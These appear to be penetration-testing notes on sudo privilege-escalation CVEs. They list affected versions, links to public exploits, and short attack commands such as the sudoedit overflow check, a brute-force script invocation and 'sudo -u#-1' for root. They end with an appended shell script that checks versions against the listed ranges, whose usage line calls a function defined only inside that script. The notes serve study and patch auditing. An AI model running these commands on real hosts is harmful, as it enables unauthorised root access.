# CVE-2021-3156 Baron Samedit

* [Animesh Jain's blog post on Qualys](https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit)
* [blasty's PoC](https://github.com/blasty/CVE-2021-3156.git)
* Heap-based overflow
* Versions 1.8.2-1.8.31p2, 1.9.0-1.9.5p1
* Check vulnerability via

  ```sh
  sudoedit -s '\' $(python -c "print('\x41' * 10000)")
  ```

* Defaults to try

  ```sh
  ./brute.sh 90 120 50 70 150 300
  ```

## CVE-2019-14287

* Versions < 1.8.28

### Usage

* Integer overflow with resulting root status.

  ```sh
  sudo -u#-1
  ```

## CVE-2019-18634

* Sudo pwnage with the `pwfeedback` option
* Sudo versions 1.7.1 to 1.8.30
* [Saleem's GitHub](https://github.com/saleemrashid/sudo-cve-2019-18634)

## Reusing Sudo Token

* Reuse the sudo token of the currently logged-in user
* [HackTricks' site](https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens)
* `ptrace` has to be fully enabled

  ```sh
  cat /proc/sys/kernel/yama/ptrace_scope
  0
  ```

* sudo has to have been run within the last 15 minutes; check with `ps wuax`
* `gdb` has to be installed
* One must be logged in as the same user whose token is to be reused
* Use [nongiach's exploit](https://github.com/nongiach/sudo_inject)

## Heap Based Overflow

* [CVE-2022-43995](https://bugzilla.redhat.com/show_bug.cgi?id=2139911)

Marco Benatto:

> Sudo 1.8.0 through 1.9.12, with the crypt() password backend, contains a plugins/sudoers/auth/passwd.c array-out-of-bounds error that can result in a heap-based buffer over-read. This can be triggered by arbitrary local users with access to Sudo by entering a password of seven characters or fewer. The impact could vary depending on the compiler and processor architecture.
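Added example, not part of the original notes or any of the linked projects: a POSIX sh helper that maps a sudo version string onto the version ranges listed above, so a host inventory can be checked offline without running any of the PoCs. It assumes sudo's `MAJOR.MINOR.PATCH[pN]` version format (as printed on the first line of `sudo -V`) and encodes only the ranges stated in these notes.

```sh
#!/bin/sh
# Added example (not part of the original notes): map a sudo version string
# onto the vulnerable ranges listed above and print the matching CVE ids.
# Assumes sudo's "MAJOR.MINOR.PATCH[pN]" version format, e.g. "1.8.31p2".

# ver_key VERSION -> one integer so versions can be compared numerically
ver_key() {
    _v="$1"; _p=0
    case "$_v" in
        *p*) _p="${_v##*p}"; _v="${_v%p*}" ;;   # split off the "pN" patch level
    esac
    _maj="${_v%%.*}"; _rest="${_v#*.}"
    _min="${_rest%%.*}"; _pat="${_rest#*.}"
    [ "$_pat" = "$_rest" ] && _pat=0          # "1.9" has no third component
    echo $(( _maj * 1000000 + _min * 10000 + _pat * 100 + _p ))
}

# in_range VERSION LOW HIGH -> true when LOW <= VERSION <= HIGH (inclusive)
in_range() {
    _k=$(ver_key "$1"); _lo=$(ver_key "$2"); _hi=$(ver_key "$3")
    [ "$_k" -ge "$_lo" ] && [ "$_k" -le "$_hi" ]
}

# add ID -> append ID to the space-separated result list in $out
add() { out="${out:+$out }$1"; }

# sudo_cves_for VERSION -> prints the CVE ids from these notes whose
# published range covers VERSION (empty line when none match)
sudo_cves_for() {
    ver="$1"; out=""
    if in_range "$ver" 1.8.2 1.8.31p2 || in_range "$ver" 1.9.0 1.9.5p1; then
        add CVE-2021-3156          # Baron Samedit heap overflow
    fi
    if [ "$(ver_key "$ver")" -lt "$(ver_key 1.8.28)" ]; then
        add CVE-2019-14287         # "sudo -u#-1", versions < 1.8.28
    fi
    if in_range "$ver" 1.7.1 1.8.30; then
        add CVE-2019-18634         # pwfeedback overflow
    fi
    if in_range "$ver" 1.8.0 1.9.12; then
        add CVE-2022-43995         # crypt() backend heap over-read
    fi
    echo "$out"
}

# installed_sudo_version -> version string from the first line of "sudo -V"
installed_sudo_version() {
    sudo -V 2>/dev/null | sed -n '1s/.* //p'
}

if [ -n "${1:-}" ]; then
    echo "sudo $1 is in the listed range for: $(sudo_cves_for "$1")"
fi
```

Run it as `sh check.sh "$(installed_sudo_version)"` on the host, or pass version strings collected from an inventory; an empty result only means none of the ranges in these notes match, not that the build is patched against everything.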